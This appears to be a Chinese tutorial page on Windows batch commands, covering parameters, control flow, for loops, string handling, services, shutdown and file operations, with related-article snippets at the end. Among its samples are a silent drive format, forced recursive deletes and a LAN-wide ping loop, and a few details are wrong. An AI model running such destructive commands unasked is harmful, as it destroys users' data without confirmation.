    call test2.bat "hello" "haha" (执行同目录下的“test2.bat”文件,并输入两个参数)
    在“test2.bat”文件里写:
    echo %1 (打印: "hello")
    echo %2 (打印: "haha")
    echo %0 (打印: test2.bat)
    echo %19 (打印: "hello"9)
    

    bat文件的路径

    当前盘符:%~d0
    当前路径:%cd%
    当前执行命令行:%0
    当前bat文件路径:%~dp0
    当前bat文件短路径:%~sdp0
    上级目录:cd .. --> %cd%
    
    文件名:%%~ni
    文件扩展名:%%~xi
    文件名.扩展名:%%~nxi
    文件名:%%~ni
    
    当前批处理文件名:%0
    批处理文件所在盘符:%~d0
    批处理文件所在文件夹:%~dp0
    只保留路径(不包括盘符):%%~pi
    

    基本命令

    help 命令

    /? 命令
    语法: 命令 /?
    可显示此命令的帮助信息
    Sample: type /? >>tmp.txt (把 type 命令的帮助信息写入到tmp.txt文件里)
    Sample: help type (显示跟“type /?”一样)
    

    tasklist命令

    找到python的进程
    tasklist |findstr python
    

    echo 命令

    语法: echo [{on|off}] [message]
    ECHO [ON | OFF] 打开回显或关闭回显功能。
    ECHO 显示当前回显设置。
    ECHO [message] 显示信息。
    echo off 表示在此语句后所有运行的命令都不显示命令行本身;默认是on,on时会显示如: C:\文件夹路径>命令行。
    在实际应用中我们会把这条命令和重定向符号( 也称为管道符号,一般用 > >> ^ )结合来实现输入一些命令到特定格式的文件中。
    Sample: echo off
    Sample: echo hello world (显示出“hello world”)
    Sample: echo Windows Registry Editor Version 5.00 > c:\setupreg.reg (此前还没有 setupreg.reg 这个文件)
    Sample: echo "SourcePath"="D:\\Win2003\\" >> c:\setupreg.reg (追加内容进 setupreg.reg 这个文件)
    

    @ 命令

    表示不显示@后面的命令
    @ 与 echo off 相象,但它是加在每个命令行的最前面,表示运行时不显示这一行的命令行(只能影响当前行)。
    Sample: @echo off (此语句常用于开头,表示不显示所有的命令行信息,包括此句)
    Sample: @echo please wait a minite...
    Sample: @format X: /q/u/autoset
    (format 这个命令中/autoset效果和/y是一样的)
    

    goto 命令

    语法:goto label (label是参数,指定所要转向的批处理程序中的行。) 
    指定跳转到标签行,找到标签行后,程序将处理从下一行开始的命令。 
    label标签的名字可以随便起,但是最好是有意义的,字母前必须加个冒号“:”来表示这个字母是标签。 
    goto命令就是根据这个冒号来寻找下一步跳到到那里。经常与 if 配合使用,根据不同的条件来执行不同的命令组。
    

    rem 命令

    语法:rem message... 
    (小技巧:用::代替rem) 
    注释命令,在C语言中相当与/*...*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和自己日后修改。 
    Sample:@rem Here is the description.
    

    pause 命令

    会暂停批处理的执行并在屏幕上显示Press any key to continue...的提示,等待用户按任意键后继续 
    Sample: 
    @echo off 
    :begin 
    copy a:*.* d:\back 
    echo Please put a new disk into driver A 
    pause 
    goto begin 
    
    在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。 
    显示的信息提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键再次复制。
    

    call 命令

    语法: call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 
    参数: [Drive:][Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 
    调用另一个批处理程序,并且不终止父批处理程序。 
    如果不用call而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令。 
    call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。 
    Sample:call="%cd%\test2.bat" haha kkk aaa (调用指定目录下的 test2.bat,且输入3个参数给他) 
    Sample:call test2.bat arg1 arg2 (调用同目录下的 test2.bat,且输入2个参数给他) 
    注:可以调用自身(死循环、递归)
    

    start 命令

    调用外部程序,所有的 DOS命令 和 命令行程序 都可以由 start命令 来调用。 也可用来打开目录或文件
    常用参数: 
    MIN 开始时窗口最小化 
    SEPARATE 在分开的空间内开始 16 位 Windows 程序 
    HIGH 在 HIGH 优先级类别开始应用程序 
    REALTIME 在 REALTIME 优先级类别开始应用程序 
    WAIT 启动应用程序并等候它结束 
    parameters 这些为传送到命令/程序的参数 
    Sample:start /MIN test2.bat arg1 arg2 (调用同目录下的 test2.bat,且输入2个参数给他,且本窗口最小化) 
    Sample:e:\"program files"\极品列车时刻表\jpskb.exe (文件路径名有空格时)
    

    explorer命令

    访问网址
    explorer http://www.baidu.com
    

    setlocal命令

    启动批处理文件中环境变量的本地化。
    set /a a=1
    if %a% equ 1 (set /a a=%a%*2 echo %a%) --> 1  echo %a%依旧是上面的set /a a=1
    
    setlocal enableDelayedExpansion
    if !a! equ 123 (set /a a=!a!*2 echo !a!) --> 2 
    

    taskkill命令

    结束某一进程。常用的有以下两种用法:
    	结束已知应用名称的某一进程
    	结束已知进程码的某一进程
    
    taskkill /im notepad++.exe
    taskkill /pid 1376 -t -f
    
    进程码可以通过任务管理器查询,或者通过 cmd 运行 tasklist 获取。
    参数 -t 表示结束该进程,-f 表示强制结束该进程及所有子进程。
    

    if 命令

    较运算符:

    EQU - 等于 (一般使用“==”) 
    NEQ - 不等于 (没有 “!=”,改用“ if not 1==1 ”的写法) 
    LSS - 小于 
    LEQ - 小于或等于 
    GTR - 大于 
    GEQ - 大于或等于 
    

    if

    语法: if [not] "参数" == "字符串" 待执行的命令 
    参数如果等于(not表示不等,下同)指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 
    Sample: if "%1" == "a" format a: 
    Sample: if {%1} == {} goto noparms  
    

    if exist

    语法: if [not] exist [路径\]文件名 待执行的命令 
    如果有指定的文件,则条件成立,运行命令,否则运行下一句。 
    Sample: if exist config.sys edit config.sys (表示如果存在这文件,则编辑它,用很难看的系统编辑器) 
    Sample: if exist config.sys type config.sys (表示如果存在这文件,则显示它的内容)
    

    if errorlevel number

    语法: if [not] errorlevel <数字> 待执行的命令 
    如果程序返回值等于指定的数字,则条件成立,运行命令,否则运行下一句。(返回值必须按照从大到小的顺序排列) 
    Sample: 
    @echo off 
    XCOPY F:\test.bat D:\ 
    IF ERRORLEVEL 1 (ECHO 文件拷贝失败 
    ) Else IF ERRORLEVEL 0 ECHO 成功拷贝文件 
    pause 
    
    很多DOS程序在运行结束后会返回一个数字值用来表示程序运行的结果(或者状态),称为错误码errorlevel或称返回码。 
    常见的返回码为0、1。通过if errorlevel命令可以判断程序的返回值,根据不同的返回值来决定执行不同的命令。
    

    else

    语法: if 条件 (成立时执行的命令) else (不成立时执行的命令) 
    如果是多个条件,建议适当使用括号把各条件包起来,以免出错。 
    Sample: if 1 == 0 ( echo comment1 ) else if 1==0 ( echo comment2 ) else (echo comment3 ) 
    注:如果 else 的语句需要换行,if 执行的行尾需用“^”连接,并且 if 执行的动作需用(括起来),否则报错 
    Sample: if 1 == 0 ( echo comment1 ) else if 1==0 ( echo comment2 ) ^ 
    else (echo comment3 ) 
    

    choice 命令

    choice 使用此命令可以让用户输入一个字符(用于选择),从而根据用户的选择返回不同的 errorlevel, 
    然后配合 if errorlevel 选择运行不同的命令。 
    注意:choice命令为DOS或者Windows系统提供的外部命令,不同版本的choice命令语法会稍有不同,请用choice /?查看用法。 
    choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。 
    使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 
    
    Sample: choice /c:dme defrag,mem,end 
    将显示: defrag,mem,end[D,M,E]? 
    Sample: 
    choice /c:dme defrag,mem,end 
    if errorlevel 3 goto defrag (应先判断数值最高的错误码) 
    if errorlevel 2 goto mem 
    if errotlevel 1 goto end
    

    for 命令

    for

    for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
    for {%variable | %%variable} in (set) do command [command-parameters]
    %variable 指定一个单一字母可替换的参数。变量名称是区分大小写的,所以 %i 不同于 %I 
    在批处理文件中使用 FOR 命令时,指定变量建议用 %%variable而不要用 %variable。 
    (set) 指定一个或一组文件。可以使用通配符。 
    command 指定对每个文件执行的命令。 
    command-parameters 为特定命令指定参数或命令行开关。
    
    如果命令扩展名被启用,下列额外的 FOR 命令格式会受到支持
    a.FOR /D %variable IN (set) DO command [command-parameters] 
    如果集里面包含通配符,则指定与目录名匹配,而不与文件名匹配。 
    b.FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters] 
    检查以 [drive:]path 为根的目录树,指向每个目录中的FOR 语句。 
    如果在 /R 后没有指定目录,则使用当前目录。如果集仅为一个单点(.)字符,则枚举该目录树。 
    c.FOR /L %variable IN (start,step,end) DO command [command-parameters] 
    该集表示以增量形式从开始到结束的一个数字序列。 
    如:(1,1,5) 将产生序列 1 2 3 4 5; 而(5,-1,1) 将产生序列 (5 4 3 2 1)。 
    d.有或者没有 usebackq 选项: 
    FOR /F ["options"] %variable IN (file-set) DO command 
    FOR /F ["options"] %variable IN ("string") DO command 
    FOR /F ["options"] %variable IN (command) DO command 
    参数"options"为: 
    eol=c - 指一个行注释字符的结尾(就一个,如“;”) 
    skip=n - 指在文件开始时忽略的行数。 
    delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。 
    tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。 
    m-n格式为一个范围。通过 nth 符号指定 mth。 
    如果符号字符串中的最后一个字符星号,那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。 
    usebackq - 指定新语法已在下类情况中使用: 
    在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。
    
    Sample:
    
    
    1. 如下命令行会显示当前目录下所有以bat或者txt为扩展名的文件名。 
    for %%c in (*.bat *.txt) do (echo %%c) 
    a. 如下命令行会显示当前目录下所有包含有 e 或者 i 的目录名。 
    for /D %%a in (*e* *i*) do echo %%a 
    b. 如下命令行会显示 E盘test目录 下所有以bat或者txt为扩展名的文件名。 
    for /R E:\test %%b in (*.txt *.bat) do echo %%b 
    for /r %%c in (*) do (echo %%c) :: 遍历当前目录下所有文件 
    c. 如下命令行将产生序列  
    for /L %%c in (1,1,5) do echo %%c   -->  1 2 3 4 5
    for %%c in (1,1,5) do echo %%c    -->  1 1 5
    d. 以下两句,显示当前的年月日和时间 
    For /f "tokens=1-3 delims=-/. " %%j In ('Date /T') do echo %%j年%%k月%%l日 
    For /f "tokens=1,2 delims=: " %%j In ('TIME /T') do echo %%j时%%k分 
    e. 把记事本中的内容每一行前面去掉8个字符 
    setlocal enabledelayedexpansion 
    for /f %%i in (zhidian.txt) do ( 
    set atmp=%%i 
    set atmp=!atmp:~8! 
    if {!atmp!}=={} ( echo.) else echo !atmp! 
    ) 
    :: 读取记事本里的内容(使用 delims 是为了把一行显示全,否则会以空格为分隔符) 
    for /f "delims=" %%a in (zhidian.txt) do echo.%%a
    

    continue 和 break

    利用 goto 实现程序中常用的 continue 和 break 命令, 其实非常简单 
    continue: 在 for 循环的最后一行写上一个标签,跳转到这位置即可 
    break: 在 for 循环的外面的下一句写上一个标签,跳转到这位置即可 
    Sample: (伪代码) 
    for /F ["options"] %variable IN (command) DO ( 
    ... do command ... 
    if ... goto continue 
    if ... goto break 
    ... do command ... 
    :continue 
    ) 
    :break
    

    ping命令

    测试网络联接状况以及信息包发送和接收状况。但是不能够测试端口。
    语法:ping IP地址或主机名 [-t] [-a] [-n count] [-l size]
    参数含义:
    -t 不停地向目标主机发送数据;
    -a 以IP地址格式来显示目标主机的网络地址;
    -n count 指定要Ping多少次,具体次数由count来指定;
    -l size 指定发送到目标主机的数据包的大小。
    Sample: ping 192.168.0.1 -t (不停的测试192.168.0.1,按ctrl+c停止)
    Sample: for /L %%a in (0,1,255) do ping 192.168.0.%%a -n 1 >> tmp.txt (ping一下所有的局域网电脑)
    

    telnet命令

    测试端口使用 telnet IP地址或主机名 端口,使用tcp协议的
    Sample: telnet 192.168.0.1 80 (测试192.168.0.1的80端口)
    

    color 命令

    设置背景及字体颜色
    语法: color bf
    b 是指定背景色的十六进制数字; f 指定前景颜色(即字体颜色)。
    颜色值: 0:黑色 1:蓝色 2:绿色 3:湖蓝 4:红色 5:紫色 6:黄色 7:白色
    8:灰色 9:淡蓝 A:淡绿 B:浅绿 C:淡红 D:淡紫 E:淡黄 F:亮白
    如果没有给定任何参数,该命令会将颜色还原到 CMD.EXE 启动时的颜色。
    如果两参数一样,视为无效输入。只有一个参数时,设置字体。
    

    random 命令

    产生随机数(正整数0~)
    echo %random%
    

    exit 命令

    结束程序。即时是被调用的程序,结束后也不会返回原程序
    

    shutdown命令

    关机
    shutdown -s
    300s 后自动关机
    shutdown -s -t 300
    取消自动关机
    shutdown -a
    立刻重启
    shutdown -r -t 0
    60s后休眠
    shutdown -h -t 60
    

    字符串处理

    分割字符串,以查看时间为例

    %源字符串:~起始值,截取长度% (起始值从0开始;截取长度是可选的,如果省略逗号和截取长度,将会从起始值截取到结尾;
    截取长度如果是负数,表示截取到倒数第几个。)
    "%time%" 显示如:"11:04:23.03" (完整的时间"hh:mm:ss.tt")
    "%time:~0,5%" 显示"hh:mm"(即"11:04"),其中0表示从右向左移位操作的个数,5表示从左向右移位操作的个数
    "%time:~0,8%" 显示标准时间格式"hh:mm:ss"(即"11:04:23",前8个字符串)
    "%time:~3,-3%"显示"mm:ss"(即从第4个开始,截去最后3个的字符串)
    "%time:~3%" 显示"04:23.03"(即去掉前4个字符串)
    "%time:~-3%" 显示".tt"(即最后3个字符串)
    上面的字串分割格式,也可以用于其它地方,如目录路径:"%cd:~0,10%"
    

    替换字符串

    set a="abcd1234"
    echo %a% 显示:"abcd1234"
    set a=%a:1=kk% 替换“1”为“kk”
    echo %a% 显示:"abcdkk234"
    

    字符串合并

    由于没有直接的字符串合并函数,只能用笨方法了。
    set str1=%str1%%str2% (合并 str1 和 str2)
    

    计算字符串长度

    没有现成的函数。如下程序利用 goto形成循环,不断将字符串截短1,并记录截短的次数,到字符串变成空时的次数即长度。
    set testStr=This is a test string
    :: 将 testStr 复制到str,str 是个临时字符串
    set str=%testStr%
    :: 标签,用于goto跳转
    :next1
    :: 判断str是不是空,如果不是则执行下边的语句
    if not "%str%"=="" (
    :: 算术运算,使num的值自增1,相当于num++或者++num语句
    set /a num+=1
    :: 截取字符串,每次截短1
    set "str=%str:~1%"
    :: 跳转到next1标签: 这里利用goto和标签,构成循环结构
    goto next1
    )
    :: 当以上循环结构执行完毕时,会执行下边的语句
    echo testStr=%testStr%
    echo testStr的长度为:%num%
    

    截取字符串时,需要传递参数

    直接 echo %args:~%num%,-5% 没办法想要的字符串,需要如下两步
    setlocal enabledelayedexpansion
    echo !args:~%num%,-5!
    

    系统服务

    服务类

    停止服务:NET STOP 服务名
    启动服务:NET START 服务名
    

    设置启动类型

    自动: SC CONFIG 服务名 START= auto
    手动: SC CONFIG 服务名 START= demand
    已禁用:SC CONFIG 服务名 START= disabled
    附:“START= ”等号后面必须要有一个空格。(start还有boot,system两个值)
    Sample: SC CONFIG Spooler START= demand (打印机加载项,设置成手动,默认自动)
    

    查看服务

    start %SystemRoot%\system32\services.msc /s
    

    文件处理

    删除

    删除一个文件或多个文件

    del /s /q /f d:\test\a.bat
    将直接删除d:\test\a.bat,没有任务提示
    del temp\* /q /f /s
    将直接删除 本目录的 temp 目录的所有文件,没有任务提示
    删除文件的时候可以使用“*”作通配符 
    

    删除一个空目录

    rd /q /s d:\test\log
    将直接删除d:\test\log目录,如果log目录里面有文件将无法删除 
    

    删除一个非空目录 (必须指定目录名称)

    rmdir /q /s d:\test\logs
    必须指定目录名称,不能使用通配符
    /S 除目录本身外,还将删除指定目录下的所有子目录
    /Q 安静模式,带 /S 删除目录树时不要求确认
    无论里面是否有文件或文件夹将全部直接删除 
    

    创建目录

    MKDIR [drive:]path
    MD [drive:]path
    路径有空格时,可以用双引号括起来,也可以用空格替代
    

    打开目录或文件

    start D:\文件夹1
    start D:\文件夹1\test.txt
    

    复制文件

    复制C的所有txt文件到D
    copy C:\*.txt D:\
    

    重命名

    所有gif扩展名改为jpg扩展名
    ren  *.gif *.jpg
    修改文件名称,把aa.txt改为bb.c
    ren aa.txt bb.c
    

    提取文件名

    提取当前目录下扩展名为mp3的文件名,输出到mp3文件名.txt
    dir *.mp3 /b>mp3文件名.txt
    输出文件的绝对路径信息
    dir *.mp3/b/s>MP3文件信息.txt
    

    隐藏文件夹

    隐藏文件夹
    attrib +s +h D:\Secret
    取消隐藏文件夹
    attrib -s -h D:\Secret
    
    attrib命令
    	attrib +/-r
    	attrib +/-a
    	attrib +/-s 
    	attrib +/-h  
    	+ 设置属性
    	- 清除属性
    	r 只读属性
    	a 存档属性
    	s 系统属性
    	h 隐藏属性
    
    展开全文
  • Windows中编写脚本BAT批处理命令入门.pdf
  • \bat批处理命令大全.txt\bat批处理命令大全.txt\bat批处理命令大全.txt
  • 常用bat批处理内部命令简介

    一、ECHO和@

    1.1 ECHO:打开或者关闭回显,或者是显示消息

    echo on:每一行命令都要显示,并且命令执行后的结果也要显示

    echo on
    echo 第一个批处理

    echo off:除了本行其他行命令不显示,但是命令执行后的结果要显示

    echo off
    echo 第一个批处理

    1.2 @:本行除了运行结果其他的命令都不显示

    @echo on
    @echo 第一个批处理

    习惯写法

    @echo off
    echo 第一个批处理
    echo 第二个批处理

    二、REM和::

    2.1 REM:注释,REM后面的命令不被执行

    @echo off
    rem 这是第一个批处理
    echo 您好

    2.2 ::  :注释(注:冒号后面加其他符号也可以是注释,但是不能是数字和字母,像:+)

    @echo off
    rem 这是第一个批处理
    :: 这是第二个批处理
    :+ 这是第三个批处理
    echo 您好

    两者的区别:rem受到echo on/off的管制,::不会。

    建议不要使用::

    三、PAUSE

    3.1 PAUSE:暂停

    @echo on
    rem 这是第一个批处理
    :: 这是第二个批处理
    echo 您好
    echo 我们今天讲批处理
    pause
    echo 你听课了嘛

    四、TITLE

    4.1 TITLE:执行命令窗口的标题 

    五、COLOR

    5.1 COLOR:设定指定控制台输出颜色的属性

    颜色对照表
    0黑色
    1蓝色
    2绿色
    3

    湖蓝色

    4红色
    5紫色
    6黄色
    7白色
    8灰色
    9蓝绿色
    A淡绿色
    B淡浅绿色
    C淡红色
    D淡紫色
    E淡黄色
    F亮白色
    color f2

    f2 代表背景是亮白色,字体是绿色

    六、MODE

    6.1 MODE:配置系统设备

    mode con cols=113 lines=15 & color 9f

    配置窗口大小以及里面显示的颜色

    七、goto和:

    7.1 goto:转向

    展开全文
  • Windows 批处理(bat)语法大全BAT批处理基本命令总结
  • nginx常用bat批处理命令,放在nginx同级目录下使用,可快速的重启、停止、关闭nginx。 quit.bat(退出Nginx) reload.bat(重启Nginx) stop.bat(停止Nginx)
  • Windows清除指定目录下的文件夹以及对应文件,自动获取电脑用户名兼容Windows7、8、10,非常好用的工具。
  • 批处理就是对某对象进行批量的处理,通常被认为是一种简化的脚本语言,它应用于DOS和Windows系统中。这篇文章主要介绍了BAT批处理判断服务是否正常运行(批处理命令综合应用),需要的朋友可以参考下
  • bat批处理命令应用详解[参考].pdf
  • 批处理bat命令大全

    2012-12-23 10:46:01
    批处理bat命令大全,常用的批处理命令,教你学会用批处理
  • 内容索引:VB源码,系统相关,BAT,批处理 VB编写的BAT批处理命令生成器,并附有命令解释器,源代码可顺利编译通过,进而有一些模块很有用,像批处理命令解释器、建立控制台的模块等,以后都用得上。  部分代码摘录: ...
  • 计算机一键休眠bat批处理命令
  • BAT批处理脚本教程.pdf

    2021-09-26 22:55:09
    BAT批处理脚本教程.pdf
  • BAT批处理文件编辑器

    2021-11-11 11:59:49
    主要用于BAT批处理文件编写时使用,能简化操作,适合新手与老手使用!
  • bat批处理命令详解

    万次阅读 2018-09-20 10:41:17
    首先,批处理文件是一个文本文件,这个文件的每一行都是一条DOS命令(大部分时候就好象我们在DOS提示符下执行的命令行一样),你可以使用DOS下的Edit或者Windows的记事本(notepad)等任何文本文件编辑工具...
  • bat批处理命令手册

    2010-10-24 04:29:39
    bat命令大全 cmd常用命令 包含命令上的常用和不太常用的命令,使用方便
  • 情景1前端项目批量移动。node目录碎片文件多导致速度慢 // e.txt为下图的记事本 xcopy s t /s /y /d:3-17-2022 /exclude:e.txt s 源 t 目标 /s 复制目录以及子目录 /y 相同名称的文件不提示是否覆盖,直接覆盖 ...
  • BAT批处理命令详解

    千次阅读 2020-12-14 16:27:40
    常用命令 1、禁止命令回显 echo off 表示此语句后的所有运行的命令都不显示命令本身(不包括输出结果)。 @ 与 echo off 相似,但它是加在每个命令的最前面,只作用于当前命令,表示运行时不显示这一命令。 2、注释 ...
  • echo Start start "" "C:\Users\Public\Desktop\phpstudy_pro.lnk" start "" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PremiumSoft\Navicat Premium 12.lnk" start "" "C:\ProgramData\Microsoft\...
  • 步骤二:重命名为.bat文件 步骤三:编辑内容,将如下代码复制并保存文件 步骤四:双击运行 @echo off echo 正在清除系統垃圾文件,請稍等...... del /f /s /q %systemdrive%\*.tmp del /f /s /q %system...
  • bat批处理-示例

    2022-04-06 12:40:20
    获取当前文件所在目录:%~dp0 @echo off echo %~dp0 pause

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 48,042
精华内容 19,216
热门标签
关键字:

bat批处理命令大全